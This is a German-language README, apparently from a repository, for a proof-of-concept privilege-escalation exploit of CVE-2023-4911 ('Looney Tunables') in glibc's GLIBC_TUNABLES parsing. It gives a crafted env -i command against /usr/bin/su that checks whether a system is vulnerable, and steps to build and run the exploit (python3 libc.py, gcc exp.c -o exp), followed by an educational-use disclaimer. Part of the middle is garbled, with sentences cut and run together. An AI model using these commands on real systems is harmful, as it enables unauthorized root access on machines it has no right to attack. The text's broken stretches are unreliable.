
Proof-of-concept-Exploit für CVE-2023-4911 (Looney Tunables), der einen Pufferüberlauf in der GLIBC_TUNABLES-Analyse von glibc ausnutzt. Enthält Schwachstellenerkennung und einen kompilierten Exploit zur Privilegieneskalation.
Dies ist ein PoC von CVE-2023-4911 (auch bekannt als "Looney Tunables"), der einen Fehler in der GLIBC_TUNABLES-Umgebungsvariablen-Parsing-Funktion parse_tunables() des glibc-Dynamic-Loaders ausnutzt.
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped) erhalten, haben wir es mit einem anfälligen Ziel zu tun.libc.so.6 Dateipython3 libc.py
gcc exp.c -o exp
Der gesamte Code, der in diesem Repository bereitgestellt wird, dient nur zu Bildungs- und Forschungszwecken. Alle Handlungen und/oder Aktivitäten, die mit dem Material in diesem Repository zusammenhängen, liegen in Ihrer alleinigen Verantwortung. Der Missbrauch des Codes in diesem Repository kann zu strafrechtlichen Anklagen gegen die betreffenden Personen führen. Der Autor übernimmt keine Verantwortung für den Fall, dass gegen Personen, die den Code in diesem Repository missbrauchen, um gegen das Gesetz zu verstoßen, strafrechtliche Anklagen erhoben werden.